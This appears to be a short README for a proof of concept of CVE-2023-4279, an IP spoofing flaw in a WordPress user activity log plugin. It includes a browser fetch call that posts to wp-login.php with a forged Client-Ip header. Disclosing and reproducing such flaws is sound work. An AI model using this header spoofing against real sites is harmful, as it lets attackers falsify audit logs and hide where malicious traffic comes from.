
Repositório para a vulnerabilidade CVE-2023-4279.
CVE ID: CVE-2023-4279
Tipo de Vulnerabilidade: Falsificação de Endereço IP
Descrição: Este plugin obtém endereços IP de clientes a partir de cabeçalhos potencialmente não confiáveis, permitindo que um invasor manipule seu valor. Isso pode ser usado para ocultar a origem de tráfego malicioso.
Passos para reproduzir:
1. In User Activity Log > Settings, enable the setting "Allow Ip Address of users to log." and save settings.
2. Run the following code in the web browser and note on the backend that the IP address has been faked.
await fetch("/wp-login.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
"Client-Ip": "8.8.8.8",
},
"body": "log=USERNAME&pwd=PASSWORD",
"method": "POST",
"mode": "cors",
"credentials": "include"
});
Referência: